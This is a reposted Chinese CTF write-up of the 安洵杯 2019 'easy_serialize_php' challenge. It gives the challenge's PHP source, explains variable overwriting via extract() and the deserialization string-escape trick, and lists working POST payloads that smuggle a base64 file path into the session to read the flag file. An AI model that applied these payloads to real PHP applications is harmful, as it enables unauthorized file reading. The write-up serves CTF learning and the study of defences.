[安洵杯 2019]easy_serialize_php

白雪新号 發表於 2020-5-1 16:57:00

<h1 class="md-end-block md-heading"> </h1>
学到的知识：extract对session数组的覆盖
 反序列化逃逸的方法
<h2 class="md-end-block md-heading">1.代码审计 </h2>
 
<div class="cnblogs_code">
<pre><?php

$function = @$_GET['f'];

function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}

if($_SESSION){
unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}</pre>
</div>
 
首先很容易在phpinfo中找到一个php文件怀疑为flag
<img src="https://img2020.cnblogs.com/blog/1969988/202005/1969988-20200501165921687-393261725.png" alt="">
这个题目里根本没有读取session文件，这个题只是把$_SESSION数组进行了serialize()，这种地方不要因为看到php处理器而犯迷糊。
过滤函数filter()是对serialize($_SESSION)进行过滤，滤掉一些关键字
我们发现unset函数将$_SESSION销毁了。
然后重新赋予$_SESSION了新的值。
最后调用了extract($_POST);
<pre class="md-fences md-end-block ty-contain-cm modeLoaded">extract() 函数从数组中将变量导入到当前的符号表。</pre>
根据extract()我们可以进行变量覆盖，
当我们传入SESSION=123时，$SESSION["user"]和$SESSION['function'] 全部会消失。
只剩下SESSION=123。
f参数要传为show_image,其次可控点就是img_path下的img,但是不能直接传，因为会进行一系列加密
<h2 class="md-end-block md-heading">2. php反序列化字符逃逸</h2>
在php中，反序列化的过程中必须严格按照序列化规则才能成功实现反序列化
如果我们在str结尾的花括号后再增加一些字符呢？
eg1：
<div class="cnblogs_code">
<pre><?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc';
var_dump(unserialize($str));
?></pre>
</div>
 
仍然可以输出上面的结果，这说明反序列化的过程是有一定识别范围的，在这个范围之外的字符(第二个例子里的abc)都会被忽略，不影响反序列化的正常进行。
eg2：
<div class="cnblogs_code">
<pre><?php
$_SESSION["user"]='flagflagflagflagflagflag'；
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);
?>

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</pre>
</div>
 
假设后台存在一个过滤机制，会将含flag字符替换为空，那么以上序列化字符串过滤结果为
<div class="cnblogs_code">
<pre>a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</pre>
</div>
 
将这串字符串进行序列化会得到什么？ 这个时候关注第二个s所对应的数字，本来由于有6个flag字符所以为24，现在这6个flag都被过滤了，那么它将会尝试向后读取24个字符看看是否满足序列化的规则，也即读取<code>;s:8:"function";s:59:"a</code>,读取这24个字符后以”;结尾，恰好满足规则，而后第三个s向后读取img的20个字符，第四个、第五个s向后读取均满足规则，所以序列化结果为：
<div class="cnblogs_code">
<pre>array(3) {
["user"]=> string(24) "";s:8:"function";s:59:"a"
["img"]=> string(20) "ZDBnM19mMWFnLnBocA=="
["dd"]=> string(1) "a"
}</pre>
</div>
 
数组形式：
<div class="cnblogs_code">
<pre>$_SESSION["user"]='";s:8:"function";s:59:"a';
$_SESSION["img"]='ZDBnM19mMWFnLnBocA==';
$_SESSION["dd"]='a';</pre>
</div>
 
可以发现，SESSION数组的键值img对应的值发生了改变。 设想，如果我们能够控制原来SESSION数组的funcion的值但无法控制img的值，我们就可以通过这种方式间接控制到img对应的值。这个感觉就像sql注入一样，他本来想读取的base64编码是：<code>L2QwZzNfZmxsbGxsbGFn</code>,但是由于过滤掉了flag,向后读取的过程中把键值function放到了第一个键值的内容里面，用<code>ZDBnM19mMWFnLnBocA==</code>代替了真正的base64编码，读取了<code>d0g3_f1ag.php</code>的内容。而识别完成后最后面的<code>";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</code>被忽略掉了，不影响正常的反序列化过程。
<h2 class="md-end-block md-heading">3.逃逸实现</h2>
get传参：?f=show_image
post调用extract函数实现变量覆盖，这里有三种post方式，均可以实现逃逸，可对比学习规律
例如 post传参：
<pre>_SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";} </pre>
<div class="cnblogs_code">
<pre><?php
#方法一
$_SESSION['flagflag']='";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
#结果 a:1:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}，这里就造成img不成为一个键，也就无法进行加密
#过滤掉flag有
#a:1:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";}
#使得绕过;s:51:""到达下一个封号，这时img成功逃逸出来

#方法二
$_SESSION['flagphp']=';s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

#方法三
$_SESSION['flagflag']='";s:2:"aa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

?></pre>
</div>
 
回显得到
<div class="cnblogs_code">
<pre><?php

$flag = 'flag in /d0g3_fllllllag';

?></pre>
</div>
 
继续替换掉base64值读取即可 L2QwZzNfZmxsbGxsbGFn
 
参考博客：
 https://www.jianshu.com/p/1f44650b0822
 https://www.jianshu.com/p/8e8117f9fd0e
 http://www.mamicode.com/info-detail-2984973.html
 https://www.cnblogs.com/h3zh1/p/12732336.html
  
来源：https://www.cnblogs.com/LLeaves/p/12813992.html

頁: [1]

琼殿技术论坛's Archiver

[安洵杯 2019]easy_serialize_php